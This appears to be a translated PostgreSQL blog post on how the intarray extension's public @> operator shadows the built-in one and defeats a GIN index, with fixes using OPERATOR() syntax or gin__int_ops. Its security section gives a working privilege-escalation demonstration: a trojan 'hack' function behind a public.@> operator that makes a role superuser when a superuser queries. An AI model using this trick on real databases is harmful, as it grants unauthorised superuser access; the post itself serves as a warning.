Label
PostgreSQL, intarray, ops, operator, OPERATOR, operator path, search_path, priority
background
Operator is one of the most commonly used elements in database. It always appears in an SQL statement.
select * from tbl where id=1;
Here = is the operator.
Actually, the underlying operator is still a function, and the operator is a synthesis of functions.
1. PostgreSQL not only allows users to customize functions, but also allows us to customize operators. See the syntax for creating operators.
https://www.postgresql.org/docs/11/static/sql-createoperator.html
2. PostgreSQL also allows users to customize the index interface, so whether the operator can use the index and what index interface can be used can be defined. And there is a corresponding relationship.
https://www.postgresql.org/docs/11/static/sql-createopclass.html
3. PostgreSQL also has a concept of namespace(schema), which means that user-defined objects are placed in namespace. So when we call functions and use operators, which functions and operators are used under the schema?
This depends on the search_path parameter of the database, with default values.
postgres=# show search_path ; search_path ----------------- "$user", public (1 row)
Usually, the built-in operators, functions and so on are under the schema pg_catalog, which is at the end of the default path.
The problem is coming.
What happens if we create operators with the same name as the built-in operators in the system and are searched first (for example, under user or public)?
Think about their relationship
op udf opclass index
Let's take an example.
Examples, arrays containing queries, perspectives
Here's an example of how arrays contain queries and perspectives. Accelerate by gin or rum index.
However, in the course of demonstration, the problem of "weird" appeared. Why don't you go index?
1. Generating Random Arrays
create or replace function gen_rand_arr(int,int) returns int[] as $$ select array(select (random()*$1)::int from generate_series(1,$2)); $$ language sql strict;
2. Create test tables
drop table t1; create table t1 (id int, c1 int, arr int[]);
3. Write 10 million data
insert into t1 select id, random()*100, gen_rand_arr(100,10) from generate_series(1,10000000) t(id);
4. Create an array index (indexing the rum and gin index interfaces, respectively, for testing purposes only)
create index idx_t1_1 on t1 using rum (arr); create index idx_t1_2 on t1 using gin (arr);
5. Viewing Sample Data
postgres=# select * from t1 limit 10; id | c1 | arr ----+----+--------------------------------- 1 | 1 | {64,22,99,58,5,0,75,50,15,100} 2 | 83 | {8,81,82,70,86,92,26,4,69,11} 3 | 61 | {9,75,61,82,65,54,100,44,54,64} 4 | 66 | {53,22,71,54,97,21,69,97,4,77} 5 | 78 | {86,47,64,78,72,68,47,83,28,57} 6 | 58 | {89,38,23,43,38,67,97,2,33,50} 7 | 24 | {4,4,21,25,73,18,29,49,95,15} 8 | 96 | {59,93,68,27,40,52,55,97,10,44} 9 | 35 | {33,86,73,100,83,76,32,34,0,36} 10 | 38 | {21,61,10,39,91,59,34,6,55,93} (10 rows)
6. Use arrays to include queries and check execution plans
postgres=# explain select count(*) from t1 where arr @> array[1,2]; QUERY PLAN ----------------------------------------------------------------- Aggregate (cost=248675.25..248675.26 rows=1 width=8) -> Seq Scan on t1 (cost=0.00..248457.00 rows=87300 width=0) Filter: (arr @> '{1,2}'::integer[]) (3 rows)
Analysis of the Problem of Unguided Index
Why hasn't it been indexed?
The reason is that we used a non-system operator @> because we created the intarray plug-in, which contains the @> operator and is created under public.
This means that when we use @>, we call @> below public, and the @> operator has its own ops, not the default OPS of gin (the default of gin in the system is gin ops of the system).
That's the answer to the mystery:
1. We call the @> added by the intarray plug-in under public, not under pg_catalog.
postgres=# \do @> List of operators Schema | Name | Left arg type | Right arg type | Result type | Description ------------+------+---------------+----------------+-------------+------------- pg_catalog | @> | aclitem[] | aclitem | boolean | contains pg_catalog | @> | anyarray | anyarray | boolean | contains -- Systematic pg_catalog | @> | anyrange | anyelement | boolean | contains pg_catalog | @> | anyrange | anyrange | boolean | contains pg_catalog | @> | box | box | boolean | contains pg_catalog | @> | box | point | boolean | contains pg_catalog | @> | circle | circle | boolean | contains pg_catalog | @> | circle | point | boolean | contains pg_catalog | @> | jsonb | jsonb | boolean | contains pg_catalog | @> | path | point | boolean | contains pg_catalog | @> | polygon | point | boolean | contains pg_catalog | @> | polygon | polygon | boolean | contains pg_catalog | @> | tsquery | tsquery | boolean | contains public | @> | integer[] | integer[] | boolean | contains -- intarray Newly added (14 rows)
contrib/intarray/intarray--1.2.sql CREATE OPERATOR @> ( LEFTARG = _int4, RIGHTARG = _int4, PROCEDURE = _int_contains, COMMUTATOR = '<@', RESTRICT = _int_contains_sel, JOIN = _int_contains_joinsel );
2. This @> is indexed by itself, but its OPS is not the default OPS of the gin index of the system, but the new gin__int_ops OPS.
contrib/intarray/intarray--1.2.sql CREATE OPERATOR CLASS gin__int_ops FOR TYPE _int4 USING gin AS OPERATOR 3 &&, OPERATOR 6 = (anyarray, anyarray), OPERATOR 7 @>, OPERATOR 8 <@, OPERATOR 13 @, OPERATOR 14 ~, OPERATOR 20 @@ (_int4, query_int), FUNCTION 1 btint4cmp (int4, int4), FUNCTION 2 ginarrayextract (anyarray, internal, internal), FUNCTION 3 ginint4_queryextract (_int4, internal, int2, internal, internal, internal, internal), FUNCTION 4 ginint4_consistent (internal, int2, _int4, int4, internal, internal, internal, internal), STORAGE int4;
3. The index we created uses the default GIN_OPS of the system, so this leads to the problem of our example above. They did not correspond.
How to solve this problem?
Complete operator invocation syntax
Since the database has the concept of SCHEMA, and our custom OP can be renamed under different SCHEMA, how do we call an OP of SCHEMA if we need to call it?
By default, searching OP, including UDF, is determined by the search_path parameter, as mentioned earlier. So we first found the @> operator created by intarray under public, which led to the problem of not leaving the index ahead.
1. Complete Grammar
expression operator expression (binary infix operator) operator expression (unary prefix operator) expression operator (unary postfix operator) OPERATOR(schema.operatorname)
In the above case,
1. Method 1. By rewriting the SQL, we can use the index, that is, to tell the database which op we need to call under the schema (corresponding to the ops of the index).
postgres=# explain select count(*) from t1 where arr OPERATOR(public.@>) array[1,2]; QUERY PLAN ----------------------------------------------------------------- Aggregate (cost=248675.25..248675.26 rows=1 width=8) -> Seq Scan on t1 (cost=0.00..248457.00 rows=87300 width=0) Filter: (arr @> '{1,2}'::integer[]) (3 rows) postgres=# explain select count(*) from t1 where arr OPERATOR(pg_catalog.@>) array[1,2]; QUERY PLAN ----------------------------------------------------------------------------------- Aggregate (cost=68581.20..68581.21 rows=1 width=8) -> Bitmap Heap Scan on t1 (cost=986.77..68362.95 rows=87300 width=0) Recheck Cond: (arr OPERATOR(pg_catalog.@>) '{1,2}'::integer[]) -> Bitmap Index Scan on idx_t1_3 (cost=0.00..964.95 rows=87300 width=0) Index Cond: (arr OPERATOR(pg_catalog.@>) '{1,2}'::integer[]) (5 rows)
2. Method 2. When creating index, use OPS corresponding to OP.
Delete the original index, change it to the following, or you can keep two index interfaces (of course, we only need one, as long as the OP invoked corresponds to the OPS in INDEX) drop index idx_t1_3; create index idx_t1_3 on t1 using gin (arr gin__int_ops);
Now, in turn, the default public OP goes indexed.
postgres=# explain select count(*) from t1 where arr OPERATOR(public.@>) array[1,2]; QUERY PLAN ----------------------------------------------------------------------------------- Aggregate (cost=68581.20..68581.21 rows=1 width=8) -> Bitmap Heap Scan on t1 (cost=986.77..68362.95 rows=87300 width=0) Recheck Cond: (arr @> '{1,2}'::integer[]) -> Bitmap Index Scan on idx_t1_3 (cost=0.00..964.95 rows=87300 width=0) Index Cond: (arr @> '{1,2}'::integer[]) (5 rows) postgres=# explain select count(*) from t1 where arr OPERATOR(pg_catalog.@>) array[1,2]; QUERY PLAN ------------------------------------------------------------------ Aggregate (cost=248675.25..248675.26 rows=1 width=8) -> Seq Scan on t1 (cost=0.00..248457.00 rows=87300 width=0) Filter: (arr OPERATOR(pg_catalog.@>) '{1,2}'::integer[]) (3 rows)
Safety Risk Attention
1. Users can define a bunch of OPS under public and renamed under pg_catalog as long as they have permission. When the superuser executes some SQL, (if search_path contains public,) the public.OP created by these users may be used preferentially, leading to security problems.
Ordinary users, for example, weigh in functions.
Example:
Ordinary users create functions and privilege.
postgres=> create or replace function hack(_int4,_int4) returns boolean as $$ declare begin alter role test superuser; raise notice 'hacked'; return $1 operator(pg_catalog.@>) $2; end; $$ language plpgsql strict security invoker; CREATE FUNCTION
Ordinary users create OP with the same name in pg_catalog under public
postgres=> create operator public.@> (procedure = hack, leftarg='_int4', rightarg='_int4'); CREATE OPERATOR
Super user calls this OP, resulting in privilege raising.
postgres=# select * from t1 where arr @> array[1,2] limit 1; NOTICE: hacked select 1 where array[1,2] @> array[1,2];
View the effect of the right-raising.
postgres=# \du+ test List of roles Role name | Attributes | Member of | Description -----------+------------+-----------+------------- test | Superuser | {} |
NOW, test has become a superuser.
Summary
1. op, index, ops should be corresponded, otherwise the problems mentioned in this paper will easily arise in use. Why don't you go indexing?
2. If you need to customize OP, try not to rename it with OP of the system.
3. Security needs to be considered. Ordinary users can use FUNCTION,OP and system FUNCTION,OP rename trap. Because public's path priority is higher than pg_catalog, super users can call this operator, which can lead to privilege raising.
Reference resources
https://www.postgresql.org/docs/11/static/sql-expressions.html#SQL-EXPRESSIONS-OPERATOR-CALLS